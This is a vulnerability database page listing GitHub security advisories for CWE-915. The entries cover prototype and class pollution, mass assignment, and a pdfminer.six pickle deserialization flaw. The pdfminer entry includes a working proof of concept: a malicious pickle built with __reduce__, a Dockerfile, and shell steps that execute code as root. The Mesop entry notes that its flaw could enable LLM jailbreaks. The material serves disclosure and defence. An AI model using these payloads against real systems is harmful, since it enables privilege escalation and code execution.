Common Weakness Enumeration

CWE-915

Allowed

Improperly Controlled Modification of Dynamically-Determined Object Attributes

Abstraction: Base · Status: Incomplete

The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.

275 vulnerabilities reference this CWE, most recent first.

GHSA-CRPF-4HRX-3JRP

Vulnerability from github – Published: 2026-02-19 20:28 – Updated: 2026-02-23 22:23
VLAI
Summary
Svelte SSR attribute spreading includes inherited properties from prototype chain
Details

In server-side rendering, attribute spreading on elements (e.g. <div {...attrs}>) enumerates inherited properties from the object's prototype chain rather than only own properties. In environments where Object.prototype has already been polluted — a precondition outside of Svelte's control — this can cause unexpected attributes to appear in SSR output or cause SSR to throw errors. Client-side rendering is not affected.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.51.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "svelte"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.51.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27125"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-19T20:28:49Z",
    "nvd_published_at": "2026-02-20T23:16:02Z",
    "severity": "MODERATE"
  },
  "details": "In server-side rendering, attribute spreading on elements (e.g. `\u003cdiv {...attrs}\u003e`) enumerates inherited properties from the object\u0027s prototype chain rather than only own properties. In environments where `Object.prototype` has already been polluted \u2014 a precondition outside of Svelte\u0027s control \u2014 this can cause unexpected attributes to appear in SSR output or cause SSR to throw errors. Client-side rendering is not affected.",
  "id": "GHSA-crpf-4hrx-3jrp",
  "modified": "2026-02-23T22:23:50Z",
  "published": "2026-02-19T20:28:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-crpf-4hrx-3jrp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27125"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/svelte/commit/73098bb26c6f06e7fd1b0746d817d2c5ee90755f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sveltejs/svelte"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/svelte/releases/tag/svelte@5.51.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Svelte SSR attribute spreading includes inherited properties from prototype chain"
}

GHSA-CWVQ-3GPH-65P4

Vulnerability from github – Published: 2025-09-29 18:33 – Updated: 2025-09-29 18:33
VLAI
Details

A mass assignment vulnerability exists in danny-avila/librechat, affecting all versions. This vulnerability allows attackers to manipulate sensitive fields by automatically binding user-provided data to internal object properties or database fields without proper filtering. As a result, any extra fields in the request body are included in agentData and passed to the database layer, allowing overwriting of any field in the schema, such as author, access_level, isCollaborative, and projectIds. Additionally, the Object.Prototype can be polluted due to the use of Object.assign with spread operators.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7104"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-29T17:15:32Z",
    "severity": "MODERATE"
  },
  "details": "A mass assignment vulnerability exists in danny-avila/librechat, affecting all versions. This vulnerability allows attackers to manipulate sensitive fields by automatically binding user-provided data to internal object properties or database fields without proper filtering. As a result, any extra fields in the request body are included in agentData and passed to the database layer, allowing overwriting of any field in the schema, such as author, access_level, isCollaborative, and projectIds. Additionally, the Object.Prototype can be polluted due to the use of Object.assign with spread operators.",
  "id": "GHSA-cwvq-3gph-65p4",
  "modified": "2025-09-29T18:33:13Z",
  "published": "2025-09-29T18:33:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7104"
    },
    {
      "type": "WEB",
      "url": "https://github.com/danny-avila/librechat/commit/a37bf6719cfbc2de270f7d87b6b85d87cc1768db"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/32a175c4-7543-4503-a3d0-7880abd1826b"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CXM3-284P-QC4V

Vulnerability from github – Published: 2020-09-03 15:53 – Updated: 2021-07-29 15:56
VLAI
Summary
Prototype Pollution in sds
Details

Affected versions of sds are vulnerable to prototype pollution. The set function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.

Recommendation

Upgrade to version 4.0.0 or later

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "sds"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7618"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T19:01:47Z",
    "nvd_published_at": "2020-04-07T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Affected versions of `sds` are vulnerable to prototype pollution. The `set` function does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n## Recommendation\n\nUpgrade to version 4.0.0 or later",
  "id": "GHSA-cxm3-284p-qc4v",
  "modified": "2021-07-29T15:56:20Z",
  "published": "2020-09-03T15:53:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7618"
    },
    {
      "type": "WEB",
      "url": "https://github.com/monsterkodi/sds/blob/master/js/set.js#L31"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-SDS-564123"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1506"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in sds"
}

GHSA-F3MF-HM6V-JFHH

Vulnerability from github – Published: 2025-03-27 18:14 – Updated: 2025-03-27 18:14
VLAI
Summary
Mesop Class Pollution vulnerability leads to DoS and Jailbreak attacks
Details

From @jackfromeast and @superboy-zjc: We have identified a class pollution vulnerability in Mesop (<= 0.14.0) application that allows attackers to overwrite global variables and class attributes in certain Mesop modules during runtime. This vulnerability could directly lead to a denial of service (DoS) attack against the server. Additionally, it could also result in other severe consequences given the application's implementation, such as identity confusion, where an attacker could impersonate an assistant or system role within conversations. This impersonation could potentially enable jailbreak attacks when interacting with large language models (LLMs).

Just like the Javascript's prototype pollution, this vulnerability could leave a way for attackers to manipulate the intended data-flow or control-flow of the application at runtime and lead to severe consequnces like RCE when gadgets are available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mesop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-30358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-27T18:14:29Z",
    "nvd_published_at": "2025-03-27T15:16:02Z",
    "severity": "HIGH"
  },
  "details": "From @jackfromeast and @superboy-zjc:\nWe have identified a class pollution vulnerability in Mesop (\u003c= [0.14.0](https://github.com/mesop-dev/mesop/releases/tag/v0.14.0)) application that allows attackers to overwrite global variables and class attributes in certain Mesop modules during runtime. This vulnerability could directly lead to a denial of service (DoS) attack against the server. Additionally, it could also result in other severe consequences given the application\u0027s implementation, such as identity confusion, where an attacker could impersonate an assistant or system role within conversations. This impersonation could potentially enable jailbreak attacks when interacting with large language models (LLMs).\n\nJust like the Javascript\u0027s prototype pollution, this vulnerability could leave a way for attackers to manipulate the intended data-flow or control-flow of the application at runtime and lead to severe consequnces like RCE when gadgets are available.",
  "id": "GHSA-f3mf-hm6v-jfhh",
  "modified": "2025-03-27T18:14:29Z",
  "published": "2025-03-27T18:14:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-f3mf-hm6v-jfhh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30358"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/commit/748e20d4a363d89b841d62213f5b0c6b4bed788f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mesop-dev/mesop"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mesop Class Pollution vulnerability leads to DoS and Jailbreak attacks"
}

GHSA-F83H-GHPP-7WCC

Vulnerability from github – Published: 2025-11-07 23:17 – Updated: 2026-02-04 16:49
VLAI
Summary
Insecure Deserialization (pickle) in pdfminer.six CMap Loader — Local Privesc
Details

🚀 Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python's pickle module for CMap file loading. It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

line

🚨 Special Note

This advisory addresses a distinct vulnerability from GHSA-wf5f-4jwr-ppcp (CVE-2025-64512).

While the previous CVE claims to mitigate issues related to unsafe deserialization, the patch introduced in commit b808ee05dd7f0c8ea8ec34bdf394d40e63501086 does not address the vulnerability reported here.

Based on testing performed against the latest version of the library (comparison view), the issue remains exploitable through local privilege escalation due to continued unsafe use of pickle files. The Dockerfile is hence modified to run test against this claim.

This demonstrates that the patch for CVE-2025-64512 is incomplete: the vulnerability remains exploitable. This advisory therefore documents a distinct, independently fixable flaw. A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data-handling approach so the library can operate normally without relying on pickle

📚 Table of Contents


🔍 Background

pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's pickle module.

🐍 Security Issue: If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.


🐍 Vulnerability Description

  • Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
  • Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
  • Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
  • Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.

line

🎭 Demo Scenario

Environment: - 🐧 Alpine Linux (Docker container) - 👨‍💻 Two users: - user1 (attacker: low-privilege) - root (victim: runs privileged PDF-processing script) - 🗂️ Shared writable directory: /tmp/uploads - 🛣️ CMAP_PATH set to /tmp/uploads for the privileged script - 📦 pdfminer.six installed system-wide

Attack Flow: 1. 🕵️‍♂️ user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads. 2. 👑 The privileged service (root) processes a PDF or calls get_cmap("Evil"). 3. 💣 The malicious pickle is deserialized, running arbitrary code as root. 4. 🎯 The exploit creates a flag file in /root/pwnedByPdfminer as proof.

line

🧨 Technical Details

  • Vulnerability Type: Insecure deserialization of untrusted data using Python's pickle
  • Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH
  • Vulnerable Line: python return type(str(name), (), pickle.loads(gzfile.read())) In pdfminer/cmapdb.py's _load_data method
  • https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
  • Proof of Concept: See createEvilPickle.py, evilmod.py, and processPdf.py

Exploit Chain: - Attacker places a malicious .pickle.gz file in the CMap search path. - Privileged process (e.g., root) loads a CMap, triggering pickle deserialization. - Arbitrary code executes with the privilege of the process (root/service account).

line

🔧 Setup and Usage

📁 Files

</> Dockerfile

FROM python:3.11-alpine

ARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086

# Install git and build tooling
RUN apk add --no-cache git build-base

WORKDIR /opt

# Clone pdfminer.six and check out the specific commit, then install from source
RUN git clone https://github.com/pdfminer/pdfminer.six.git && \
    cd pdfminer.six && \
    git fetch --all && \
    git checkout ${PM_COMMIT} && \
    pip install --no-cache-dir -e .

# App working directory for PoC
WORKDIR /app

# Create low-privilege user and uploads dir
RUN adduser -D user1 && \
    mkdir -p /tmp/uploads && \
    chown user1:user1 /tmp/uploads && \
    chmod 1777 /tmp/uploads

# Copy PoC files
COPY evilmod.py /app/evilmod.py
COPY createEvilPickle.py /app/createEvilPickle.py
COPY processPDF.py /app/processPDF.py

ENV CMAP_PATH=/tmp/uploads
ENV PYTHONUNBUFFERED=1

# Keep the container running in background so you can exec into it anytime.
CMD ["tail", "-f", "/dev/null"]

</> evilmod.py

import os

def evilFunc():
    with open("/root/pwnedByPdfminer", "w") as f:
        f.write("ROOTED by pdfminer pickle RCE\n")
    return {"CODE2CID": {}, "IS_VERTICAL": False}

</> createEvilPickle.py

import pickle
import gzip
from evilmod import evilFunc

class Evil:
    def __reduce__(self):
        return (evilFunc, ())

payload = pickle.dumps(Evil())
with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f:
    f.write(payload)

print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz")

</> processPDF.py

import os
from pdfminer.cmapdb import CMapDB

os.environ["CMAP_PATH"] = "/tmp/uploads"

CMapDB.get_cmap("Evil")

print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.")

line

1️⃣ Build and start the demo container

docker build -t pdfminer-priv-esc-demo .
docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-democ

2️⃣ In the container, open two shells in parallel (or switch users in one):

🕵️‍♂️ Shell 1 (Attacker: user1)

su user1
cd /app
python createEvilPickle.py
# ✅ Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1

👑 Shell 2 (Victim: root)

cd /app
python processPdf.py
# 🎯 Output: If vulnerable, /root/pwnedByPdfminer will be created

3️⃣ Proof of escalation

cat /root/pwnedByPdfminer
# 🏴 Output: ROOTED by pdfminer pickle RCE

proof-of-exploit

line

📝 Step-by-step Walkthrough

  1. user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
  2. The root user runs a typical PDF-processing script, which loads CMap files from that directory.
  3. The exploit triggers, running arbitrary code as root.
  4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).

line

🛡️ Security Standards & References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pdfminer.six"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20251230"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-70559"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T23:17:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### \ud83d\ude80 Overview\n\nThis report **demonstrates a real-world privilege escalation** vulnerability in [pdfminer.six](https://github.com/pdfminer/pdfminer.six) due to unsafe usage of Python\u0027s `pickle` module for CMap file loading.\nIt shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udea8 Special Note\n\nThis advisory addresses a distinct vulnerability from [GHSA-wf5f-4jwr-ppcp (CVE-2025-64512)](https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp).\n\nWhile the previous CVE claims to mitigate issues related to unsafe deserialization, the patch introduced in commit [b808ee05dd7f0c8ea8ec34bdf394d40e63501086](https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086) does not address the vulnerability reported here.\n\nBased on testing performed against the latest version of the library ([comparison view](https://github.com/pdfminer/pdfminer.six/compare/20250506...20251107)), the issue remains exploitable through local privilege escalation due to continued unsafe use of pickle files. The **Dockerfile** is hence modified to run test against this claim.\n\nThis demonstrates that the patch for **CVE-2025-64512** is incomplete: the vulnerability remains exploitable. This advisory therefore documents a distinct, independently fixable flaw. A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data-handling approach so the library can operate normally without relying on ```pickle```\n\n## \ud83d\udcda Table of Contents\n\n- [\ud83d\udd0d Background](#-background)\n- [\ud83d\udc0d Vulnerability Description](#-vulnerability-description)\n- [\ud83c\udfad Demo Scenario](#-demo-scenario)\n- [\ud83e\udde8 Technical Details](#-technical-details)\n- [\ud83d\udd27 Setup and Usage](#-setup-and-usage)\n- [\ud83d\udcdd Step-by-step Walkthrough](#-step-by-step-walkthrough)\n- [\ud83d\udee1\ufe0f Security Standards \u0026 References](#-security-standards--references)\n---\n\n## \ud83d\udd0d Background\n\n**pdfminer.six** is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python\u0027s `pickle` module.\n\n\u003e \ud83d\udc0d **Security Issue:**\n\u003e If the CMap search path (`CMAP_PATH` or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious `.pickle.gz` file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.\n\n---\n\n### \ud83d\udc0d Vulnerability Description\n\n- **Component:** pdfminer.six CMap loading (`pdfminer/cmapdb.py`)\n- **Issue:** Loads and deserializes `.pickle.gz` files using Python\u2019s `pickle` module, which is unsafe for untrusted data.\n- **Exploitability:** If a low-privileged user can write to any directory in `CMAP_PATH`, they can execute code as the user running pdfminer\u2014potentially root or a privileged service.\n- **Impact:** Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n### \ud83c\udfad Demo Scenario\n\n**Environment:**\n- \ud83d\udc27 Alpine Linux (Docker container)\n- \ud83d\udc68\u200d\ud83d\udcbb Two users:\n  - `user1` (attacker: low-privilege)\n  - `root` (victim: runs privileged PDF-processing script)\n- \ud83d\uddc2\ufe0f Shared writable directory: `/tmp/uploads`\n- \ud83d\udee3\ufe0f `CMAP_PATH` set to `/tmp/uploads` for the privileged script\n- \ud83d\udce6 pdfminer.six installed system-wide\n\n**Attack Flow:**\n1. \ud83d\udd75\ufe0f\u200d\u2642\ufe0f `user1` creates a malicious CMap file (`Evil.pickle.gz`) in `/tmp/uploads`.\n2. \ud83d\udc51 The privileged service (`root`) processes a PDF or calls `get_cmap(\"Evil\")`.\n3. \ud83d\udca3 The malicious pickle is deserialized, running arbitrary code as root.\n4. \ud83c\udfaf The exploit creates a flag file in `/root/pwnedByPdfminer` as proof.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### \ud83e\udde8 Technical Details\n\n- **Vulnerability Type:** Insecure deserialization of untrusted data using Python\u0027s `pickle`\n- **Attack Prerequisites:** Attacker can write to a directory included in `CMAP_PATH`\n- **Vulnerable Line:**\n  ```python\n  return type(str(name), (), pickle.loads(gzfile.read()))\n  ```\n  *In `pdfminer/cmapdb.py`\u0027s `_load_data` method*\n- https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246\n- **Proof of Concept:** See `createEvilPickle.py`, `evilmod.py`, and `processPdf.py`\n\n**Exploit Chain:**\n- Attacker places a malicious `.pickle.gz` file in the CMap search path.\n- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.\n- Arbitrary code executes with the privilege of the process (root/service account).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udd27 Setup and Usage\n\n### \ud83d\udcc1 Files\n#### \u003c/\u003e Dockerfile\n```yml\nFROM python:3.11-alpine\n\nARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086\n\n# Install git and build tooling\nRUN apk add --no-cache git build-base\n\nWORKDIR /opt\n\n# Clone pdfminer.six and check out the specific commit, then install from source\nRUN git clone https://github.com/pdfminer/pdfminer.six.git \u0026\u0026 \\\n    cd pdfminer.six \u0026\u0026 \\\n    git fetch --all \u0026\u0026 \\\n    git checkout ${PM_COMMIT} \u0026\u0026 \\\n    pip install --no-cache-dir -e .\n\n# App working directory for PoC\nWORKDIR /app\n\n# Create low-privilege user and uploads dir\nRUN adduser -D user1 \u0026\u0026 \\\n    mkdir -p /tmp/uploads \u0026\u0026 \\\n    chown user1:user1 /tmp/uploads \u0026\u0026 \\\n    chmod 1777 /tmp/uploads\n\n# Copy PoC files\nCOPY evilmod.py /app/evilmod.py\nCOPY createEvilPickle.py /app/createEvilPickle.py\nCOPY processPDF.py /app/processPDF.py\n\nENV CMAP_PATH=/tmp/uploads\nENV PYTHONUNBUFFERED=1\n\n# Keep the container running in background so you can exec into it anytime.\nCMD [\"tail\", \"-f\", \"/dev/null\"]\n\n```\n\n#### \u003c/\u003e evilmod.py\n```python\nimport os\n\ndef evilFunc():\n    with open(\"/root/pwnedByPdfminer\", \"w\") as f:\n        f.write(\"ROOTED by pdfminer pickle RCE\\n\")\n    return {\"CODE2CID\": {}, \"IS_VERTICAL\": False}\n```\n#### \u003c/\u003e createEvilPickle.py\n```python\nimport pickle\nimport gzip\nfrom evilmod import evilFunc\n\nclass Evil:\n    def __reduce__(self):\n        return (evilFunc, ())\n\npayload = pickle.dumps(Evil())\nwith gzip.open(\"/tmp/uploads/Evil.pickle.gz\", \"wb\") as f:\n    f.write(payload)\n\nprint(\"Malicious pickle created at /tmp/uploads/Evil.pickle.gz\")\n```\n#### \u003c/\u003e processPDF.py\n```python\nimport os\nfrom pdfminer.cmapdb import CMapDB\n\nos.environ[\"CMAP_PATH\"] = \"/tmp/uploads\"\n\nCMapDB.get_cmap(\"Evil\")\n\nprint(\"CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\")\n```\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### 1\ufe0f\u20e3 Build and start the demo container\n\n```bash\ndocker build -t pdfminer-priv-esc-demo .\ndocker run --rm -it --name pdfminer-demo pdfminer-priv-esc-democ\n```\n\n### 2\ufe0f\u20e3 In the container, open two shells in parallel (or switch users in one):\n\n#### \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Shell 1 (Attacker: user1)\n```bash\nsu user1\ncd /app\npython createEvilPickle.py\n# \u2705 Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1\n```\n\n#### \ud83d\udc51 Shell 2 (Victim: root)\n```bash\ncd /app\npython processPdf.py\n# \ud83c\udfaf Output: If vulnerable, /root/pwnedByPdfminer will be created\n```\n\n### 3\ufe0f\u20e3 Proof of escalation\n\n```bash\ncat /root/pwnedByPdfminer\n# \ud83c\udff4 Output: ROOTED by pdfminer pickle RCE\n```\n\n\u003cimg width=\"815\" height=\"889\" alt=\"proof-of-exploit\" src=\"https://github.com/user-attachments/assets/f465d17c-a3af-49c5-9dbc-eec9635b36fc\" /\u003e\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udcdd Step-by-step Walkthrough\n\n1. **user1** uses `createEvilPickle.py` to craft and place a malicious CMap pickle in a shared upload directory.\n2. The **root** user runs a typical PDF-processing script, which loads CMap files from that directory.\n3. The exploit triggers, running arbitrary code as root.\n4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udee1\ufe0f Security Standards \u0026 References\n\n- **CVSS (Common Vulnerability Scoring System):**\n  - **Base Score:** 7.8 (High)\n  - **Vector:** `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`\n\n- **OWASP Top 10:**\n  - [A08:2021 - Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)\n  - [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/) (by analogy, as it\u0027s code injection via deserialization)\n\n- **MITRE CWE References:**\n  - [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n  - [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n\n- **MITRE ATT\u0026CK Techniques:**\n  - [T1055: Process Injection](https://attack.mitre.org/techniques/T1055/)\n  - [T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)",
  "id": "GHSA-f83h-ghpp-7wcc",
  "modified": "2026-02-04T16:49:50Z",
  "published": "2025-11-07T23:17:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-f83h-ghpp-7wcc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70559"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pdfminer/pdfminer.six"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Insecure Deserialization (pickle) in pdfminer.six CMap Loader \u2014 Local Privesc"
}

GHSA-F98M-Q3HR-P5WQ

Vulnerability from github – Published: 2021-05-06 18:12 – Updated: 2021-12-14 15:33
VLAI
Summary
Prototype Pollution in locutus
Details

All versions of package locutus prior to version 2.0.12 are vulnerable to Prototype Pollution via the php.strings.parse_str function.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "locutus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7719"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-20",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-05T18:44:01Z",
    "nvd_published_at": "2020-09-01T10:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of package locutus prior to version 2.0.12 are vulnerable to Prototype Pollution via the php.strings.parse_str function.",
  "id": "GHSA-f98m-q3hr-p5wq",
  "modified": "2021-12-14T15:33:28Z",
  "published": "2021-05-06T18:12:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7719"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kvz/locutus/pull/418"
    },
    {
      "type": "WEB",
      "url": "https://github.com/locutusjs/locutus/commit/0eb16d8541838e80f3c2340a9ef93ded7c97290f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kvz/locutus"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-LOCUTUS-598675"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in locutus"
}

GHSA-F9CV-665R-275H

Vulnerability from github – Published: 2021-09-01 18:36 – Updated: 2021-08-30 19:27
VLAI
Summary
Prototype Pollution in merge-change
Details

All current versions of package merge-change are vulnerable to Prototype Pollution via the utils.set function.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "merge-change"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23421"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-30T19:27:27Z",
    "nvd_published_at": "2021-08-11T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All current versions of package merge-change are vulnerable to Prototype Pollution via the utils.set function.",
  "id": "GHSA-f9cv-665r-275h",
  "modified": "2021-08-30T19:27:27Z",
  "published": "2021-09-01T18:36:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23421"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/VladimirShestakov/merge-change"
    },
    {
      "type": "WEB",
      "url": "https://github.com/VladimirShestakov/merge-change/blob/9901f145e06158f284f52de42e6ba5b0f702fb65/utils.js#L89-L123"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-MERGECHANGE-1310985"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
